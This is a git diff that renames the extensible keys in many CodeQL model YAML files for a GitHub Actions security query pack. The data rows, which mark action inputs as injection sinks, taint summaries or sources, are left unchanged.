a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index f20a877c3d28..d0a88ff31673 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index e0fe96ff9152..a29f84a55b5e 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml 
+++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index a7489b686882..0e11fe45b42c 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index c0a18c36465f..7e0970034a52 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 79ed7a80437c..2f62f211da9c 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 550b5b854ed7..f94ad242321d 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index bbe886112595..5872399881c5 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 83b3bc3520df..02c5dcd3ccaa 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 3b0642fece44..45bf0c57355a 100644 
--- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index db55d3c6f3a8..4ac3492c41c3 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a4539923b35f..a48da0cedfcc 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 462268636874..6ca7aa86c06d 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] 
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index afe3e82ca1f6..11f1f10980fe 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 5b0a9dab38d7..9ed2cb7908b8 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 35bbd72f0a4d..7f279f37a45d 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 472778d33b4b..68f434f4797a 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml 
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 1647e5607304..890a47c79fca 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index bbdad8287dd3..aff5c3303165 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index f3ac66006d99..8f5e22fa2d96 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml 
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"]
 - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"]
diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml
index 9189245e2289..ff0131da99e3 100644
--- a/ql/lib/ext/docker_build-push-action.model.yml
+++ b/ql/lib/ext/docker_build-push-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml
index bd64fc374236..1d82fb8f836f 100644
--- a/ql/lib/ext/endbug_latest-tag.model.yml
+++ b/ql/lib/ext/endbug_latest-tag.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"]
 - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"]
diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml
index 9a20279e1103..1e4cc21dd130 100644
--- a/ql/lib/ext/expo_expo-github-action.model.yml
+++ b/ql/lib/ext/expo_expo-github-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"]
 - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"]
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
index 8d06bc8a5121..ba729868a040 100644
--- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
+++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml
index 9d066ac23ecd..504f0693977d 100644
--- a/ql/lib/ext/frabert_replace-string-action.model.yml
+++ b/ql/lib/ext/frabert_replace-string-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"]
 - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"]
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
index 71d837742315..48267b6d0820 100644
--- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"]
 - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"]
diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
index 563da9d4c0f4..26eea1d2341b 100644
--- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"]
 - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml
index 5194ce500fb1..7993d827fa6f 100644
--- a/ql/lib/ext/game-ci_unity-builder.model.yml
+++ b/ql/lib/ext/game-ci_unity-builder.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"]
 - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"]
diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml
index 8c2f32627d90..de48ea5a7092 100644
--- a/ql/lib/ext/game-ci_unity-test-runner.model.yml
+++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
index f74ae81a52c8..36a9b24f0891 100644
--- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
+++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
index 877543ea8e4f..f04f8dda6c8e 100644
--- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
+++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"]
 - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
index 1c9d4a7f6d98..a37d6452d504 100644
--- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
+++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"]
 - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
index a9d657247359..352eb51996af 100644
--- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
+++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"]
 - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
index d40014b9a129..44f34c11cb3d 100644
--- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
+++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
index 7452ddc21876..3fd2e46296ab 100644
--- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
+++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"]
 - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
index a91d2c7b0e57..881374b6c903 100644
--- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
+++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"]
 - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
index 95b5ba13ad17..6d77c866dc25 100644
--- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
+++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
index 7157e1bea48a..0b27c5845844 100644
--- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
+++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
index a3f43d524b4a..911d3e571558 100644
--- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
+++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"]
 - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
index 6e0d980943a1..1ac668cf55ac 100644
--- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"]
 - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
index ef682ff4fffe..5cf121dcef26 100644
--- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"]
 - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
index 7ce84599d17d..d946204e9b96 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
index 47f1c83016f5..c6839a7b004e 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"]
 - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
index 54353368db2e..9e708bbcc898 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/arrow", "*", "input.upload", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
index 119115c15609..cfb67540b174 100644
--- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
index 762623ed27e2..7186433e6d27 100644
--- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/brpc", "*", "input.options", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
index 2272d7ff8e68..d39aafe162ff 100644
--- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"]
 - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
index 3537169892a4..a3b53b3ec960 100644
--- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"]
 - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
index dfac696dddf3..2a35d22a10e0 100644
--- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"]
 - ["apache/flink", "*", "input.env", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml
index 2e28ad9e900c..156d244ece2d 100644
--- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
index 5c82922c35e0..fcda4b3dfec0 100644
--- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"]
 - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
index d618f7b761fe..84877f57d8c2 100644
